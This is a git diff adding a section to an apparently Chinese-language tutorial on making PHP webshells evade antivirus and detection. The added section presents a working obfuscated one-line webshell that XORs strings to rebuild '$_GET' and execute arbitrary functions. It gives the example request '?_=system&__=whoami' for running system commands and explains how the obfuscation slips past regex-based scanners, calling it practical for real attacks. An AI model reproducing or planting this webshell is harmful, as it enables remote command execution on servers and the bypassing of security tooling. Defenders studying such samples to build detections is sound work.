Update README.md

Author: AabyssZG

README.md

@@ -1254,6 +1254,38 @@ $f($_GET['b']);
 
 为什么要写入为 `system.aabyss` 这个文件名呢，因为特殊后缀能让代码快速锁定文件，不至于提取文件名提取到其他文件了
 
+## 12# 多姿势配合免杀
+
+将以上提到的相关姿势，进行多种配合嵌套，实现免杀效果
+
+### 12.1 样例一
+
+刚开始看这个样例我还是挺惊讶的，仔细分析了一波，发现还是挺简单的，但重在思路
+这个样例使用了异或+变换参数的手法，成功规避了正则匹配式，具有实战意义
+
+```php
+<?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]);
+```
+这时候，就可以执行GET传参：`?_=system&__=whoami` 来执行whoami命令
+
+由8.1讲到PHP中如何异或，我们就先把最前面这部分拆出来看看
+```php
+<?=~$_='$<>/'^'{{{{';
+//即 '$<>/' ^ '{{{{'
+//即 "$<>/" 这部分字符串与后面 "{{{{" 这部分字符串异或
+```
+所以由我们前面所学的知识，加上自己动手实践一下，可以发现异或结果为 `_GET`
+
+所以整个PHP语句解密后，再将 `_` 替换为 `a`，将 `__` 替换为 `b`，则原PHP转化为：
+```php
+$_GET['a']($_GET['b'])
+```
+当我们给 `a` 传 `system`，给 `b` 传 `whoami`，原式就会变成这样
+```php
+system('whoami');
+```
+所以你学废了吗？更多有趣的WebShell免杀案例等我后续更新~
+
 
 # 四，总结